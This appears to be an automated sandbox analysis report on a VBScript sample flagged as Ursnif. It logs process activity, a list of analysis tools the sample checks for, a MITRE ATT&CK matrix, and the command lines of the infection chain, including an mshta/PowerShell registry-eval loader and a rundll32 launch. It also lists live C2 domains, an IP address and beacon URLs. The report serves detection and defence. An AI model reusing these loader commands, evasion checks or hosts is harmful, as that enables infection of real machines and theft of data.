                    Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmpBinary or memory string: SBIESVC.EXE(
                    Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmpBinary or memory string: PROCMON.EXE@
                    Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmpBinary or memory string: SBIESVC.EXE
                    Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmpBinary or memory string: IMPORTREC.EXE
                    Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmpBinary or memory string: IMUL.EXE.8
                    Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmpBinary or memory string: Q?$SANDBOXIERPCSS.EXEV5
                    Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmpBinary or memory string: IDAG.EXE@:V
                    Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
                    Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmpBinary or memory string: IDAQ.EXE
                    Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmpBinary or memory string: PEID.EXE#Z
                    Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmpBinary or memory string: OLLYDBG.EXE
                    Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmpBinary or memory string: PETOOLS.EXE@J
                    Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmpBinary or memory string: AUTORUNS.EXE
                    Source: wscript.exe, 00000000.00000003.716103963.000001C48F7B1000.00000004.00000001.sdmpBinary or memory string: D"WINAPIOVERRIDE32.EXE","ETHEREAL.EXE","MBARUN.EXE","REPUX.EXE","WINDBG.EXE","ETTERCAP.EXE","MDPMON.EXE","RUNSAMPLE.EXE","WINDUMP.EXE","FAKEHTTPSERVER.EXE","MMR.EXE","SAMP1E.EXE","WINSPY.EXE","FAKESERVER.EXE","MMR.EXE","SAMPLE.EXE","WIRESHARK.EXE","FIDDLER.EXE","MULTIPOT.EXE","SANDBOXIECRYPTO.EXE","XXX.EXE","FILEMON.EXE","NETSNIFFER.EXE","SANDBOXIEDCOMLAUNCH.EXE")
                    Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmpBinary or memory string: HOOKANAAPP.EXE
                    Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
                    Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmpBinary or memory string: TCPDUMP.EXE
                    Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmpBinary or memory string: FILEMON.EXET
                    Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmpBinary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
                    Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmpBinary or memory string: A9$BEHAVIORDUMPER.EXEQ
                    Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmpBinary or memory string: DUMPCAP.EXE
                    Source: C:\Windows\System32\wscript.exe TID: 1992Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5964Thread sleep time: -4611686018427385s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6643
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2678
                    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_05741577 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_057314A0 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_05746E4E lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_05751802 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,
                    Source: rundll32.exe, 00000012.00000003.797288272.0000000000B78000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_05745529 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_05752A09 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,

                    HIPS / PFW / Operating System Protection Evasion:

                    barindex
                    Benign windows process drops PE filesShow sources
                    Source: C:\Windows\System32\wscript.exeFile created: fum.cpp.0.drJump to dropped file
                    System process connects to network (likely due to code injection or exploit)Show sources
                    Source: C:\Windows\SysWOW64\rundll32.exeDomain query: atl.bigbigpoppa.com
                    Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.251.90.253 80
                    Compiles code for process injection (via .Net compiler)Show sources
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.0.csJump to dropped file
                    Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Dhqv='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dhqv).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.cmdline'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.cmdline'
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB252.tmp' 'c:\Users\user\AppData\Local\Temp\kuljoghz\CSCFD41DB177D83417DAD6FB740EC17B379.TMP'
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESC397.tmp' 'c:\Users\user\AppData\Local\Temp\cshxvr3e\CSC395E5146EDFE427593BFE3FCA45BE18C.TMP'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_00F26CD6 cpuid
                    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_0574E3F3 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_00F266CE GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_00F25A5D GetVersion,lstrcat,lstrcat,lstrcat,GetLastError,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_00F26CD6 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,
                    Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmpBinary or memory string: procmon.exe
                    Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmpBinary or memory string: tcpview.exe
                    Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmpBinary or memory string: wireshark.exe
                    Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmpBinary or memory string: avz.exe
                    Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmpBinary or memory string: cports.exe
                    Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmpBinary or memory string: lordpe.exe
                    Source: wscript.exe, 00000000.00000003.716309926.000001C4938DD000.00000004.00000001.sdmpBinary or memory string: icesword.exe
                    Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmpBinary or memory string: autoruns.exe
                    Source: wscript.exe, 00000000.00000003.716280073.000001C4938A8000.00000004.00000001.sdmpBinary or memory string: ollydbg.exe
                    Source: wscript.exe, 00000000.00000003.716129422.000001C4938E6000.00000004.00000001.sdmpBinary or memory string: regshot.exe

                    Stealing of Sensitive Information:

                    barindex
                    Yara detected UrsnifShow sources
                    Source: Yara matchFile source: 00000012.00000003.794954307.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.794836470.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.794735521.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.797221471.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.794770084.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.794874719.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.794800647.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.859811207.0000000005BE8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.794900142.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.794931081.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.801557253.000000000517C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6704, type: MEMORYSTR
                    Source: Yara matchFile source: 18.3.rundll32.exe.527a4a0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.3.rundll32.exe.527a4a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.3.rundll32.exe.5328d48.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.3.rundll32.exe.52f94a0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000012.00000002.871947216.0000000004FFF000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.799908702.000000000527A000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.799937952.00000000052F9000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.890326064.00000200BE266000.00000004.00000001.sdmp, type: MEMORY

                    Remote Access Functionality:

                    barindex
                    Yara detected UrsnifShow sources
                    Source: Yara matchFile source: 00000012.00000003.794954307.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.794836470.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.794735521.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.797221471.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.794770084.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.794874719.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.794800647.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.859811207.0000000005BE8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.794900142.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.794931081.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.801557253.000000000517C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6704, type: MEMORYSTR
                    Source: Yara matchFile source: 18.3.rundll32.exe.527a4a0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.3.rundll32.exe.527a4a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.3.rundll32.exe.5328d48.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.3.rundll32.exe.52f94a0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000012.00000002.871947216.0000000004FFF000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.799908702.000000000527A000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.799937952.00000000052F9000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.890326064.00000200BE266000.00000004.00000001.sdmp, type: MEMORY

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts1Windows Management Instrumentation221Valid Accounts1Valid Accounts1Disable or Modify Tools1Credential API Hooking3System Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact1
                    Default AccountsScripting121Boot or Logon Initialization ScriptsAccess Token Manipulation1Scripting121LSASS MemoryAccount Discovery1Remote Desktop ProtocolEmail Collection1Exfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsNative API1Logon Script (Windows)Process Injection212Obfuscated Files or Information2Security Account ManagerFile and Directory Discovery3SMB/Windows Admin SharesCredential API Hooking3Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsExploitation for Client Execution1Logon Script (Mac)Logon Script (Mac)File Deletion1NTDSSystem Information Discovery46Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCommand and Scripting Interpreter1Network Logon ScriptNetwork Logon ScriptRootkit4LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaPowerShell1Rc.commonRc.commonMasquerading11Cached Domain CredentialsSecurity Software Discovery131VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsValid Accounts1DCSyncVirtualization/Sandbox Evasion41Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobModify Registry1Proc FilesystemProcess Discovery2Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Access Token Manipulation1/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                    Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Virtualization/Sandbox Evasion41Network SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                    Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronProcess Injection212Input CaptureRemote System Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                    Compromise Software Supply ChainUnix ShellLaunchdLaunchdRundll321KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 481106 Sample: sample.vbs Startdate: 10/09/2021 Architecture: WINDOWS Score: 100 54 art.microsoftsofymicrosoftsoft.at 2->54 56 resolver1.opendns.com 2->56 62 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->62 64 Multi AV Scanner detection for domain / URL 2->64 66 Found malware configuration 2->66 68 12 other signatures 2->68 9 wscript.exe 2 2->9         started        13 mshta.exe 19 2->13         started        15 WmiPrvSE.exe 2->15         started        17 2 other processes 2->17 signatures3 process4 file5 46 C:\Users\user\AppData\Local\Temp\fum.cpp, PE32 9->46 dropped 72 Benign windows process drops PE files 9->72 74 VBScript performs obfuscated calls to suspicious functions 9->74 76 Deletes itself after installation 9->76 78 Creates processes via WMI 9->78 80 Suspicious powershell command line found 13->80 19 powershell.exe 1 32 13->19         started        23 rundll32.exe 15->23         started        signatures6 process7 file8 42 C:\Users\user\AppData\...\kuljoghz.cmdline, UTF-8 19->42 dropped 44 C:\Users\user\AppData\Local\...\cshxvr3e.0.cs, UTF-8 19->44 dropped 70 Compiles code for process injection (via .Net compiler) 19->70 25 csc.exe 3 19->25         started        28 csc.exe 3 19->28         started        30 conhost.exe 19->30         started        32 rundll32.exe 2 23->32         started        signatures9 process10 dnsIp11 48 C:\Users\user\AppData\Local\...\cshxvr3e.dll, PE32 25->48 dropped 36 cvtres.exe 25->36         started        50 C:\Users\user\AppData\Local\...\kuljoghz.dll, PE32 28->50 dropped 38 cvtres.exe 1 28->38         started        52 atl.bigbigpoppa.com 185.251.90.253, 49818, 49819, 49820 SPRINTHOSTRU Russian Federation 32->52 58 System process connects to network (likely due to code injection or exploit) 32->58 60 Writes registry values via WMI 32->60 40 control.exe 32->40         started        file12 signatures13 process14

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    No Antivirus matches

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    18.2.rundll32.exe.f20000.0.unpack100%AviraHEUR/AGEN.1108168Download File

                    Domains

                    SourceDetectionScannerLabelLink
                    art.microsoftsofymicrosoftsoft.at4%VirustotalBrowse
                    atl.bigbigpoppa.com9%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    http://art.microsoftsofymicrosoftsoft.at/M0s2qYX0svCgNwwi/PPI7Xc5SLSkLQIY/5lrOW2oNgPCEjObB3W/rK9MpeZNZ/UBjNTHqn019AlZCIEx5P/tkwag9cTBuiHiomNMOd/c4Fs5ApV0T_2BnjVwW3gyf/bJPiicUJ8f_2F/p_2BzDHN/AttyzxcYoU5_2FqrCObbGoi/jSm_2BVGxu/KGJY3tUfrdwytDYZ_/2BjCzYCnXysU/C2JbU3dlXVl/5uJ7MQlXxw8eLV/q0zaTcL3CTeSA980379DA/dHPHAS9NwOC9V6VK/lP_2FDVrlGe4ayd/LAmEzNRn3GukTSqHPk/HGsc32BVj/4Gvn4Q9G8MH6Q5yTHXJc/ulutZq7s0%Avira URL Cloudsafe
                    http://art.microsoftsofymicrosoftsoft.at/08OHsz1N1FvuG6kjmE/aTh0zMsnZ/SI0oUmCO_2BS5MoLEECj/uZ7K5bJdnYQx3WN05uH/v_2Fm83_2BmFHvZHPW65zA/GW0_2BJDiUD1w/ZK6b_2Bh/StY6HpePFkaOsmwn5z64jk4/hNqOPWlFAk/QdUHTQ0be2zDX_2Bp/gFERm0UEw08y/zSKvozh3BGq/IuojbbR5mE_2FM/dq0z5j8vfE1Mb6ztPRP2X/B41DadMfELfCe7ey/X881VUbPPRiD756/vcgjm_2B6diCc8QiJ8/zWiCv09og/LPjcs0IySRyGzo4FtAjY/MaQN7Yj0rwdcUGBU3Lw/cxZIrRpMI9kt/XnFePhCWR/v0%Avira URL Cloudsafe
                    http://constitution.org/usdeclar.txt0%URL Reputationsafe
                    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                    http://art.microsoftsofymicrosoftsoft.at/W7oPFKe8v92MJK/3s9n12Zlxxip0RpYqadjX/SO7W1_2FF9Pkd4OV/Fr1cAJR5yzwxrV5/Jx7W_2FGpEVbkHb92i/nk7onhk3e/t3LARu0x8PsikCuNcG3A/xVZtlmy23EEwScpeJDo/wvuFYBZUTBSU84oV7Elz6G/vj_2F1HMVCKsF/ltj9usP8/bN_2Bx9_2BXwYInwNajYI72/h9Hrv5vhx_/2F82si9cIkqX7v6R4/9UOOaco5x39h/66X8TzwdR07/vkpw_2FwebnNKA/xttU1J1hU1aqHEwJ_2BPb/e_2FLASBRA3M51hv/aDQxYMFh2bS_2BM53oI/t0%Avira URL Cloudsafe
                    https://contoso.com/0%URL Reputationsafe
                    http://constitution.org/usdeclar.txtC:0%URL Reputationsafe
                    https://contoso.com/License0%URL Reputationsafe
                    https://contoso.com/Icon0%URL Reputationsafe
                    http://atl.bigbigpoppa.com/HIIzq4V5S2buP7HU_2F/DcYCSfdPvqaYNdJRMij7gI/5MXe0SZWrBJ2g/js7YCX8y/fDLeVNW100%Avira URL Cloudmalware
                    http://atl.bigbigpoppa.com/100%Avira URL Cloudmalware
                    http://https://file://USER.ID%lu.exe/upd0%Avira URL Cloudsafe
                    http://atl.bigbigpoppa.com/LZpNlL8ctf0/9G8k9mmuTSS5tz/8E5AsgXcbJMRL1oRInDsm/26uAVe_2F5ldrkH0/uiu44eu100%Avira URL Cloudmalware
                    http://atl.bigbigpoppa.com/HIIzq4V5S2buP7HU_2F/DcYCSfdPvqaYNdJRMij7gI/5MXe0SZWrBJ2g/js7YCX8y/fDLeVNWGS38iu6HBSu0eZQC/bmSTwgO68w/mDzLSD0yv5NsCWUYa/KrMPefIXTo7Y/kYocGyKbfHI/qpROOMC7W3BpuS/FiHxn9Vj_2BE_2BRO1MPS/HSvVFR_2FvFubdta/FMJR0bw3OFOckhz/gihVzVqSiIHGsYLcl_/2FiUzDnO5/Znp2qHqDPmJt_2FKhKU2/B1dWx_2FKsmf5DpcS8Z/eu7lOAGu9ogHBSfDIGfPdL/lCnFrX6yLs9rJ/djJKkMKB/PGYeMNf7nd3nwYWaABiF0QM/d100%Avira URL Cloudmalware
                    http://atl.bigbigpoppa.com/LZpNlL8ctf0/9G8k9mmuTSS5tz/8E5AsgXcbJMRL1oRInDsm/26uAVe_2F5ldrkH0/uiu44euzNQd9TRf/1Zb3P4q5F0mc0qdltC/bLlV5uCsx/obqe2ve9g7Th5DnAa17u/ifRiDnyBBWyxfspwjbc/4e64zsAjWvHHh07WM2IgYy/t1JnmxqkM0edm/B_2Fp0Xl/aO6EV9JJQOgg5QsFoCbzQfO/_2BOZLcUIR/ooMrpCxMndVWwPntp/mvRIBZb_2B_2/Beg4_2F_2Fr/I_2FcfrvgLZ_2F/J3NCkzqZf5_2Fr1C_2BZp/h9SFOIo1qkmT8Tal/3qdDBO5XKEdw_2F/4xqo8eXRx/pJscFz7Rq/r100%Avira URL Cloudmalware
